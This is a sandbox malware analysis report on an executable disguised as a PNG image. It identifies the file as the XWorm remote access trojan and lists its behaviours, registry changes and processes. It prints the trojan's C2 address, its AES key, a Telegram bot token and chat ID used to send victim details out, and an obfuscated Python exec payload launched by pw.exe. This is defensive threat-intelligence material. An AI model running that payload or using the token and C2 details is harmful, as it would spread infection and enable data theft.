File name:

photo_for_you.png.exe

Full analysis: https://app.any.run/tasks/f331701c-605a-487f-8c5d-01db6c9cd0da
Verdict: Malicious activity
Threats:

XWorm is a remote access trojan (RAT) sold as a malware-as-a-service. It possesses an extensive hacking toolset and is capable of gathering private information and files from the infected computer, hijacking MetaMask and Telegram accounts, and tracking user activity. XWorm is typically delivered to victims' computers through multi-stage attacks that start with phishing emails.

Malware Trends Tracker     >>>
Analysis date: November 22, 2024, 07:37:12
OS: Windows 11 Professional (build: 22000, 64 bit)
Tags:
telegram
remote
xworm
ims-api
generic
python
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 6 sections
MD5:

1322AD021F0CEF91C1CD526E83373704

SHA1:

419D5CD3166069ADE53790BF4058DD164C690A24

SHA256:

0467EE83070E28023FAF9B096A7710B9B58A4B3B937B80CB3406E30B9FBEE853

SSDEEP:

393216:HKkT+cd1SW0NiI4ttmeu+ekuz0VCnn+a+yeU8kuj/EQPZo41o3pu1ZJ:HxuN9lOCB+yVEsQiEn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Create files in the Startup directory

      • pw.exe (PID: 5768)

    • XWORM has been detected (YARA)

      • AddInProcess32.exe (PID: 1760)

    • XWORM has been detected (SURICATA)

      • AddInProcess32.exe (PID: 1760)

    • Connects to the CnC server

      • AddInProcess32.exe (PID: 1760)

  • SUSPICIOUS

    • The process drops C-runtime libraries

      • photo_for_you.png.exe (PID: 5864)

    • Executable content was dropped or overwritten

      • photo_for_you.png.exe (PID: 5864)

    • Process drops legitimate windows executable

      • photo_for_you.png.exe (PID: 5864)

    • Process drops python dynamic module

      • photo_for_you.png.exe (PID: 5864)

    • Reads security settings of Internet Explorer

      • photo_for_you.png.exe (PID: 5864)

    • Loads Python modules

      • pw.exe (PID: 5768)

    • Reads the date of Windows installation

      • photo_for_you.png.exe (PID: 5864)

    • Reads the Internet Settings

      • photo_for_you.png.exe (PID: 5864)
      • AddInProcess32.exe (PID: 1760)

    • Executes application which crashes

      • pat.exe (PID: 4588)

    • Reads settings of System Certificates

      • AddInProcess32.exe (PID: 1760)

    • Possible usage of Discord/Telegram API has been detected (YARA)

      • AddInProcess32.exe (PID: 1760)

    • Connects to unusual port

      • AddInProcess32.exe (PID: 1760)

    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • AddInProcess32.exe (PID: 1760)

    • Contacting a server suspected of hosting an CnC

      • AddInProcess32.exe (PID: 1760)

  • INFO

    • Reads the computer name

      • photo_for_you.png.exe (PID: 5864)
      • photo_for_you.png.exe (PID: 3664)
      • photo_for_you.png.exe (PID: 2240)
      • pat.exe (PID: 4588)
      • AddInProcess32.exe (PID: 1760)

    • Manual execution by a user

      • photo_for_you.png.exe (PID: 3664)
      • photo_for_you.png.exe (PID: 2240)

    • Checks supported languages

      • photo_for_you.png.exe (PID: 5864)
      • photo_for_you.png.exe (PID: 3664)
      • photo_for_you.png.exe (PID: 2240)
      • pw.exe (PID: 5768)
      • pat.exe (PID: 4588)
      • AddInProcess32.exe (PID: 1760)

    • Creates files or folders in the user directory

      • pw.exe (PID: 5768)

    • Reads the machine GUID from the registry

      • pw.exe (PID: 5768)
      • AddInProcess32.exe (PID: 1760)

    • The process uses the downloaded file

      • photo_for_you.png.exe (PID: 5864)

    • Checks proxy server information

      • AddInProcess32.exe (PID: 1760)

    • Reads the software policy settings

      • AddInProcess32.exe (PID: 1760)

    • Attempting to use instant messaging service

      • AddInProcess32.exe (PID: 1760)

    • Disables trace logs

      • AddInProcess32.exe (PID: 1760)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

XWorm

(PID) Process(1760) AddInProcess32.exe
C2202.55.133.44:7000
Keys
AES<123456789>
Options
Splitter<Xwormmm>
Sleep time3
USB drop nameXWorm V5.2
MutexgnMcad6Ece51qScn

ims-api

(PID) Process(1760) AddInProcess32.exe
Telegram-Tokens (1)8055981010:AAHZc9nW4eI9_Rz1z8z7v-Jy-8fvSjoLuq0
Telegram-Info-Links
8055981010:AAHZc9nW4eI9_Rz1z8z7v-Jy-8fvSjoLuq0
Get info about bothttps://api.telegram.org/bot8055981010:AAHZc9nW4eI9_Rz1z8z7v-Jy-8fvSjoLuq0/getMe
Get incoming updateshttps://api.telegram.org/bot8055981010:AAHZc9nW4eI9_Rz1z8z7v-Jy-8fvSjoLuq0/getUpdates
Get webhookhttps://api.telegram.org/bot8055981010:AAHZc9nW4eI9_Rz1z8z7v-Jy-8fvSjoLuq0/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8055981010:AAHZc9nW4eI9_Rz1z8z7v-Jy-8fvSjoLuq0/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8055981010:AAHZc9nW4eI9_Rz1z8z7v-Jy-8fvSjoLuq0/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token8055981010:AAHZc9nW4eI9_Rz1z8z7v-Jy-8fvSjoLuq0
End-PointsendMessage
Args
chat_id (1)-1002292872097
Token8055981010:AAHZc9nW4eI9_Rz1z8z7v-Jy-8fvSjoLuq0
End-PointsendMessage
Args
chat_id (1)-1002292872097
text (1)☠ [XWorm V5.2] New Clinet : B5E2530D9DB62C20B20B UserName : admin OSFullName : Microsoft Windows 1
Token8055981010:AAHZc9nW4eI9_Rz1z8z7v-Jy-8fvSjoLuq0
End-PointsendMessage
Args
chat_id (1)-1002292872097
text (1)☠ [XWorm V5.2] New Clinet : B5E2530D9DB62C20B20B UserName : admin OSFullName : Microsoft Windows 11 Pro USB : False CPU : Intel i5-6400 @ 2.70GHz GPU : Microsoft Basic Display Adapter RAM : 3.99 GB Groub : XWorm V5.2 HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2024:11:17 16:26:48+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.42
CodeSize: 3158528
InitializedDataSize: 61422080
UninitializedDataSize: -
EntryPoint: 0x2ef8e4
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
FileVersionNumber: 0.1.0.0
ProductVersionNumber: 0.1.0.0
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
FileVersion: 0.1.0
FileDescription: ilverbulmpp
ProductVersion: 0.1.0
ProductName: ilverbulmpp
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
126
Monitored processes
11
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start photo_for_you.png.exe photo_for_you.png.exe no specs dllhost.exe no specs photo_for_you.png.exe dllhost.exe no specs pw.exe pat.exe conhost.exe no specs #XWORM addinprocess32.exe werfault.exe dllhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1328"C:\Windows\system32\DllHost.exe" /Processid:{B41DB860-64E4-11D2-9906-E49FADC173CA}C:\Windows\System32\dllhost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
COM Surrogate
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
1760"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
pat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
AddInProcess.exe
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\addinprocess32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64base.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64con.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
XWorm
(PID) Process(1760) AddInProcess32.exe
C2202.55.133.44:7000
Keys
AES<123456789>
Options
Splitter<Xwormmm>
Sleep time3
USB drop nameXWorm V5.2
MutexgnMcad6Ece51qScn
ims-api
(PID) Process(1760) AddInProcess32.exe
Telegram-Tokens (1)8055981010:AAHZc9nW4eI9_Rz1z8z7v-Jy-8fvSjoLuq0
Telegram-Info-Links
8055981010:AAHZc9nW4eI9_Rz1z8z7v-Jy-8fvSjoLuq0
Get info about bothttps://api.telegram.org/bot8055981010:AAHZc9nW4eI9_Rz1z8z7v-Jy-8fvSjoLuq0/getMe
Get incoming updateshttps://api.telegram.org/bot8055981010:AAHZc9nW4eI9_Rz1z8z7v-Jy-8fvSjoLuq0/getUpdates
Get webhookhttps://api.telegram.org/bot8055981010:AAHZc9nW4eI9_Rz1z8z7v-Jy-8fvSjoLuq0/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8055981010:AAHZc9nW4eI9_Rz1z8z7v-Jy-8fvSjoLuq0/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8055981010:AAHZc9nW4eI9_Rz1z8z7v-Jy-8fvSjoLuq0/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token8055981010:AAHZc9nW4eI9_Rz1z8z7v-Jy-8fvSjoLuq0
End-PointsendMessage
Args
chat_id (1)-1002292872097
Token8055981010:AAHZc9nW4eI9_Rz1z8z7v-Jy-8fvSjoLuq0
End-PointsendMessage
Args
chat_id (1)-1002292872097
text (1)☠ [XWorm V5.2] New Clinet : B5E2530D9DB62C20B20B UserName : admin OSFullName : Microsoft Windows 1
Token8055981010:AAHZc9nW4eI9_Rz1z8z7v-Jy-8fvSjoLuq0
End-PointsendMessage
Args
chat_id (1)-1002292872097
text (1)☠ [XWorm V5.2] New Clinet : B5E2530D9DB62C20B20B UserName : admin OSFullName : Microsoft Windows 11 Pro USB : False CPU : Intel i5-6400 @ 2.70GHz GPU : Microsoft Basic Display Adapter RAM : 3.99 GB Groub : XWorm V5.2 HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
1948C:\Windows\system32\WerFault.exe -u -p 4588 -s 656C:\Windows\System32\WerFault.exe
pat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Problem Reporting
Exit code:
0
Version:
10.0.22000.348 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
2240"C:\Users\admin\Desktop\photo_for_you.png.exe" C:\Users\admin\Desktop\photo_for_you.png.exe
explorer.exe
User:
admin
Integrity Level:
HIGH
Description:
ilverbulmpp
Version:
0.1.0
Modules
Images
c:\users\admin\desktop\photo_for_you.png.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
2492"C:\Windows\system32\DllHost.exe" /Processid:{9F156763-7844-4DC4-B2B1-901F640F5155}C:\Windows\System32\dllhost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
COM Surrogate
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
3664"C:\Users\admin\Desktop\photo_for_you.png.exe" C:\Users\admin\Desktop\photo_for_you.png.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Description:
ilverbulmpp
Exit code:
3221225547
Version:
0.1.0
Modules
Images
c:\users\admin\desktop\photo_for_you.png.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
4392"C:\Windows\system32\DllHost.exe" /Processid:{9F156763-7844-4DC4-B2B1-901F640F5155}C:\Windows\System32\dllhost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
COM Surrogate
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
4588"C:\winnit\pat.exe" C:\winnit\pat.exe
photo_for_you.png.exe
User:
admin
Company:
The Qt Company Ltd.
Integrity Level:
MEDIUM
Description:
Qt Compressed Help File Generator
Exit code:
3221226505
Version:
5.15.2.0
Modules
Images
c:\winnit\pat.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ucrtbase.dll
c:\winnit\qt5gui.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
4652\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
5768"C:/winnit/pw/pw.exe" -c exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b85decode('c$|eeS#sM*mfW;hmR+vB?5gf6wU!p8mIok3N(${H0j>avoy?e)3?LzbL;?gsa5d#0cgOV4e9R51KKmAPf;j+hP*<3*NkDSD+7UBD2J*eke7U?eGoK#f7f81a39-5f63-5b42-9efd-1f13b5431005lt;d?wT75)ZJG!lUk7)25A0HYup!Wf8!Fb?7&On^iPm%vg8m%(xfSHMaLSHWrspMWPJTmx$%d<ve1a2>3N@ELf9VGKRDKLejdgEiwQX1@S0LOg*!x4!^i*k6J#!}=2X%KjRB9pcOA8~a=EZHTX+@9dZ0rTq%LvcCu4hi$9q2m5#6cOm`+{oei&{21bE=qGyvY}kJQf3P>fro9EW>}{|e_B};A_8-9??Om{ICqWXots8srnXz}5fY0G)e@TFS_yT_Zmk9V1`~rT7;Q{;#evRR4_znCP!+(L_!Iu~kM(pPo@YOF-K*I0g54a^|5bf7f81a39-5f63-5b42-9efd-1f13b5431005gt;f`922HM#@OPkK);*LL~Y7Ujq%Wf7f81a39-5f63-5b42-9efd-1f13b5431005gt;`#9-7{3*xYc`(W9WXT=itUCTJ{hcdJh`O*dj47RdVsv)hu|Ix;1T8#}tW%>YErYKa#~4@oP$0Bnp&}UaU2$d4asGUsDZC66b|$48F*FQ`eUq*X#Lsp@QnG$)&~exZ^;C7E9XHGwv2&KkjDebb@Jbwc*{J;Vo9&UdQn<@>D6aw8ZAcR)fN8E)|qIUsx<D`O-DNNJwQ?T&z6|ochLKvFsWC&~x<YZ_F;h<M_)5rniO*Kk{>Q9{B}}<?m58;CF^P+F~tW%yvCvFi1wduQ1);Bi>64{(JRo;CmgXec^qFtIvXIVz^j~hIKvmo3&Q(xB6kN{|eXgqcHj&|L<ckb{}s??h_9!g~*?OykDBf=dt<H%gDEpd33(y$L6@_n@CWH7~TiH@t2VYnpiA=XF)A~7U@5Su|(v43DZRIT(9q!=SwjDIPN#|{(tk#6F<l2%k$Vn-viylsF#szETw3qf9NOXiT8mSCD>mBd3ph_zXpQE8cm?iz+WtRs?#<Wab!4)Wz}^J2L?LEN=dFP5)dnY5x0!#A}TDR-9@}N^cT_2BB7hA7fSh|c!i5a+|v&~3j`R{)}smhUyuD1{UN#<U5%|rUqoL;w=nJ{Kb8K{;}=T*5Et_>y!<uxGIAfoI1Vx)9`_^N=sb!`%r%Vtd;C5TN+BNDL^96)`Xb;gx>$00j&39q-b%PF#~3eGnR<b`rLLQc6>KkofhU)|KLlIf42u1La82*Hrs4U<#9u5w;GeSiR5b>-j}!bD>~=L|bv^n;6q^<KDPyt6=o$YY6+iNCkvnWgF!q;K9~*OEPJxky+y5u)k3U-Fm%-32T(q%N{`~x3WB1r1=dr&<0y+FG^8QiZ{}JoQgomACF9^1Vy)O2e@ctNVJF5LX`oQQ%R@Tk}{RggdvHig{wj#4{Cq3`=8S3dO8eF{oNRy0t8^N$AhBLGc5BolD`6$3}-ouZkfM?nIFzc(Rcl4=b;=fh-t4HVdV_2EdU+_O*@#n;YvwPo!_Ub(eX8%)AtcCmU*ly4BZ?SQDuS0&r?cn(5bw)vG3aoa`8>qMciz<VzM^y$w8U%`Z5vcL>)6G7M{3a63A|E5seGGek495s;ga5GD1javD?2;d!Cva?tVJ{Dkz*yM2g7FxPhxjVS<1i88Pq4o(&7WZEHGgToHebcqQ-68>biRVI_4ztBlO@*sKHy<5@Z_I@f(V#jSuAVnz{norBjGsn5bMJ*7jhF?W~hYF`I65TUk232nOnmNDB*4B=${25`K|aq`w&?_P&~)<fxtf0KMzKHYzxLb3tZ$MO^bCrh1PK%J6CXsctEg$JRkviI4)@UIPO_M`LX)^QB#i#f2z#q=2Y`K@Pj@B;S2)q*J7(U2CYZe;(?O}F!(289)mm8|HR%~69~U1ka=E$6|s{OB!X&7bfqF&w8RU!8ZTRZNW;0TAR$_(=n7}iIe}nvk|gJJTlVV3lRisxGsbppP(oRmIw{vkb0E)9OBRmDFhyq=TkdeSD>D}K>I&+EluU^B<S^f*k!GKyWJk`*1y<1<mS!l~79DBKA-O9d7E`t|s^Z#;lPjqdknomNkoTv0n)Wp(m)C56%y#7pKLe;`XKJ!VR5iH*0O^hyf|Lw}1iFMOGL0-9A>WXs3GeVuZN_(10`ydi7*`2IC`DfeG^~kEuE7u|Q%Ru<9O+67kx>*HTH>{vtCBjw+Y_WoV62FUl_>((Wkn|SNvjJoOcM-sLiY7$WeifV(Gtx*tGE-0_oz|kfT43EqgnAmk!-b`>xoYI#XJHOYq2GPf@Mj{%%JSDqRp~!28QBH9~sg((@IUOdeLOrQYDRf^q?*GHDx?uot6hs1=Q(YTA<l3Uu==kqBCl#T~$TS(`6)pv`Y&Xs7e-aG^$O?GrGcer9%O=Cye4sI%ORK5tI}ew^KCFNtK*Npgbqh1Cg4{beYc>f-lvjldjQrIlPwvi(Fb)us%~6B#<<r5&qODQHN5qO(<5Sq}hOA(sWTMK~uJYEegJ=7GxRPsMR7XWkrIHp0*|;flMHs(D}}ZC|m8ZAfq9ZLb4(8j+C-8qC=%w3+1aRiGUL3%K?fixh0T>iX^cvFPn8J(@d3QN1!Mjigv|r5zM${lZ1rYRR;6JQxgYFPa0fPrbLG(I7e1MlkKvzT-s=|t|H4Ni1)<g2NO8;eI^A5wUl2_niZ38!m*s9GOEPSq(UwyD`Zg~yBSfU3reA!(ImdhB5ML>Ajc9XLs%rnqD69Q(a-WUZShK`0h$bH6u68|3^K5b=ah4;I_3AVj7+hF#++Rq>9#b^JKPvjERrl@ViYSSCN*)HnOS6uND)bS$Twxja7>O<kj0dENfX(bM!8t07AdE}2-+Nh{mWKt*W^)qD$sJDnK4zystj6InP4c^QLxV%3Xx(IJ}poud3J`<oa|C+(HtpFCL<AJLUdq-FY#kBoog8~Vz6)Utr?(T8rwHTkXRNJGj_2aWmln*sY#O*E1FXdp}bn+Iet1w<7EV+3sq2bOPXjpyj7u<0;s4nYOGRaQnM?pCPG0Md{9gADaqCesbr?|cE;38l}=sBq;(=g$PU}X&R1!r`2sKLW8E5OfLI=}l0Op^-_@G3sF7@sDZ(m1xh79mY%#^taF#0o649Jk_Shy>WlH))=(fq0Wip!8n$}2Wq9_QlO?QU(-%yJ#rBHfWE`biVld(pdEsiuP&Y?Xa%_Fr)c2(@Rno~)!)&%>yEY>+!)rutGDc@D|CsU1<%fc*23bb5484c-acd3-5883-ae5d-000aa204eed3
sk+2)U{`$QHY3R!h4Q6wQ<%_%uLfjg#q&U=abG4-gv53bZr?WTwgYv7SqLn;aQMz$wz0(8RW<*rdZFx}_pB&snS|Dixbcvvrm-tFmO$h9ae8=|Q)ej7ADY%POkWgd#JNWxh~NWo)I{stU8~4CA;Bp(zWHl5?!>syuRgOjEYmB3tH2zONLZ$B|$NyR6HmvA+ho?VL0un=La4+ENLLLWx&Js*L4eb_LEINFp-@k~!AXCZl5C<;6-<k|a_qo?y96(z*g1tPhzfF*BK%aBSCfMM|zh5=ra~G>w9lW+_mD)Fj6dAT2n&l((>rrO1Inkw|Rjn(FkV##$LcQ6`pBG-)mc0WZ<MuJAIBdsa(=1IDS0M1tlxS+=EF*%Lb_W!2)F^#Y&f($^`NDpy4djanj<q2*5iMUp(#%kUPN$G$CVC7A;fIh2T#Y)fj-Bm(u+Qh6ezcuqrnMk>*@x(tv!_3Kp<jex}u`2v`!V;Ar?%5V;n)ihhtQWHiLsd2rDxg)T4MbwogIKlHxIAt)_Q@#mo;3yVyfnu6^@pz^w*gvS_sjOr;?5kte@~OPdrgX7Fsz?rOIWIXC(CSJgpuvQtDh+XFc10?a#hy`A(`Fr5lLkYg7MQ_2KrpLVWD1fwNsuZmwB3eb0fCnetD16B(k;_fEwfn9ALIDy76fX5V{dr|oYoj3RuYPGi6M>;CCMyGj+v@U?Fm3UEvL<Ly+|sCWg^`vld6-eDFt>4IM;-Po`E9XR{_;|k{(G8Ly9!Y>d16~P0C^uWbt`kWGtS>c2bckAaj!6l1kVI)7N7`1hj%L4-KyOaOaTZI-mc)?j+~u|MX~BdVFt$7u6Ilf{Q4M+($zg+^VBL$HI#%epm(%CqMB%@=GjuM!k;&ISzcmjIrS>5kC-DY}Ff>Dt`0(Qx`wdm#{U!!D5{rI${1n#I1{!HtK2kt&m&-&x2><ZTPAW?`UjrJ*$Uz?Xa<@bq(DI>&8SkhM4jW&-3X;ZrK|;j^PzPysd%@`SajXE(RC2zhVaUt*fL$-syu@EjjLN8EU%N%JoHe)J>JWI?%Ud_U>Z4a#2swZ7%6=kI36QC>3w-@2)hUHr~`OyIa=r%~kfec$q7<GW~6Kys_o@Z&N9BI2pE1`>m^+dZ#q0<?@rv=|%2MkK*r;#!|%Y`Q7khaD3jq=oL4Q(&pj#e*d6fpzEb~HQ9HrpntN-`0(hBe{?+7ru$WAFypdXr3Oo#ql&^nvvX>R5<b)B#fkdnxO+W1<Zk!w&iii;YFGF7r#GTXTy5&8Su_f)O{jhQF89`Y+f};#`a%6dlCQS-WOHN>`&-RyYtlYsh^wtBF-g5W+e+>G!@<rLTiY#W@=Qu`tL@t>N%1Adwa8jgolBJl?6&M1sd?P0HYabvAbk%H3~Smhuf7f81a39-5f63-5b42-9efd-1f13b5431005lt;Fik9SaMW3RNE%$_S%Scj=@<>>ky$s|W(b#rzwuMA7$o9kYyv7@({q1egHhxhMFo3r`OpwNS}Gn*djBVzBMc~hI0O58=o-nyPyJ2!*IX}PWDQF42@QE+-AXSnUS=JlJKvV6$AJ2=&P=`t#?pw^eq4gHL2x1{WNW7oQDoY`Wwm9pQS?2gn<t9opmB==QScei&c7xunOzAL{`GqQrVy8Rs-CER;f-tQa@&VWADZj$x#*}<r`v$r#^998d{wWjTLFD0;hd!qG5wQ^=^3-9!kZ9^4ZC7H~(8q<6JVDE}|-|SBdBfCiKx24kgW_8Z=#}w<H(KBOTuHVf@o0I*1v%0Sp?|08DRkoOCyW_nUe_&TrY=w6=<-PKlE~|r?pLGN_dvsN;pJ&J85ph=)PeysUa7;?(=EinOPo7?#9*e|j@_Jmz?%$qPT4HT(?qvPWyXJv)tXqP!byG>QgrjbQ+~8D@$l~s8mh!g77KLiCvE6#N0r$_}nf#%AD3nv@2H@W|IQs6oPRs>;uR~Zix<1}GsqaALnh|=EKJ~M*zP;D++=ete7;X+q8%IX({N%J*+qt_}F3qbNs>A)a?$9gt72E0Ui<i?>e(&w63$OD2h4gM)yI}STUDz`isehk4ED=(6ws8daE%T60?b~XRvy;;Gv^y@Ma{YR+T`u8wg@vCt>Auq7sZ!IG#Jzf>Gk?oSmuK>AvYKs+l(5y}^V7aPA5D+Wo%72LPn~b?Z=Sl>Vs6j4bxEi>7rW<qdas4vnTC6Cc;HAHRPKeH%ggifjXro=?6t+LuU+&IvqQF~^Bzc_?V6r>+a>NPb}!=`zw5jy<u;ST>3)$%jfvJPGG~6udsk1U4u~B(cc_*Kbzbu(^UGawe{Vc3pIUCNd)Dvo^tc<=OhO$Ylhn8(cSpycwgL7K=II|wT)bnuWU?rnwNJY*yzs>Hulf)Q?RwC_b!QYnH^ERn|3*KbC`!jrBj^rdSWwMf4h4v?+CR^<$S+-WT&`oX8+u&WzU9O3){85>!@C`w*e0dFo^r7`n$XG{`h?RPUX@EN4eyvdbfSVqMmb;@Aj0Lc;a~NBjN&N<%^5^bRO>2oRNN`I+i!$3iy^#OCPhXX?g2<*gB|Why2y#?$X}k#%gVY_V%5+1^kOEqi9}U$jn<6)n;mu-7Fn+=S2k`pKsiz+w8{q8@+PPBo7y{-T)-JgP!AE;Lr?K27T1=jWk#um_xsVz^Z5ThsMCiRKXFkh<OHBnRVQ|4l)+8P7kc&L&ESowy{VAx$4E*V5qrXPd5ew@7rL?Cu2h!^mNPcz2K1ZV&OWbIxta3^MZtomk66&)eoD3;}3l2PSt@!z7CEY{WUba*N@o{Z#g(%o`u=%-s}8BQYc8VdBH&wrk55k9(x-@4R!RYF%5G~U~SxS(y1`D;5`kGDLp(Az4c&ZkRI}$2St$m^nxTL`0Rn;H6Hjt`FYUwMNkA8y)c*dke^BZbABdF*96%K?<6RKV{efN_y6&v{CHfhp4mM(M8-uRph1xKaKm)ui!j^qRapLj;TN&h*y@YbrPcUqeC_3GbZu!p_CGG-aUl'))))
C:\winnit\pw\pw.exe
photo_for_you.png.exe
User:
admin
Company:
Python Software Foundation
Integrity Level:
MEDIUM
Description:
Python
Exit code:
0
Version:
3.10.11
Modules
Images
c:\winnit\pw\pw.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64base.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64con.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
Total events
11 785
Read events
11 763
Write events
22
Delete events
0

Modification events

(PID) Process:(5864) photo_for_you.png.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(5864) photo_for_you.png.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(5864) photo_for_you.png.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(5864) photo_for_you.png.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(1760) AddInProcess32.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(1760) AddInProcess32.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(1760) AddInProcess32.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(1760) AddInProcess32.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
Operation:writeName:FileTracingMask
Value:
